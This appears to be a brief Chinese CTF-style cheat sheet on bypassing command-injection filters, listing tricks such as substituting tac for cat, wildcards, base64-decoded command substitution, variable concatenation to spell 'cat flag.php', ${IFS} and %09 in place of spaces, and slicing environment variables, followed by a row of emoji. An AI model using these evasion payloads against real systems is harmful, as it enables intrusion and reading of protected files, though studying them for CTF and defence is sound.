1 替换法
不让用cat 我们用tac
2 通配符
使用* 或者? 匹配敏感字符
3 整天编码解码法
♾️ text 代码:cat `echo 'xxxx' | base64 -d`4 关键字拼接法
a=c;b=at;c=fla;d=g.php $a$b $c$d; //cat flag.php
5 符号过滤突破 空格
可以使用 读取时 使用<> ,使用${IFS}代替空格 ,特殊符号代替空格 %09
6 环境变量字符串截取法 获取敏感字符
cmd=env获取全局变量
用env获取到变量的值为:${php_phpinfo:12:1}
👍
💖
💯
💦
😄
🪙
👍
💖
💯
💦
😄
🪙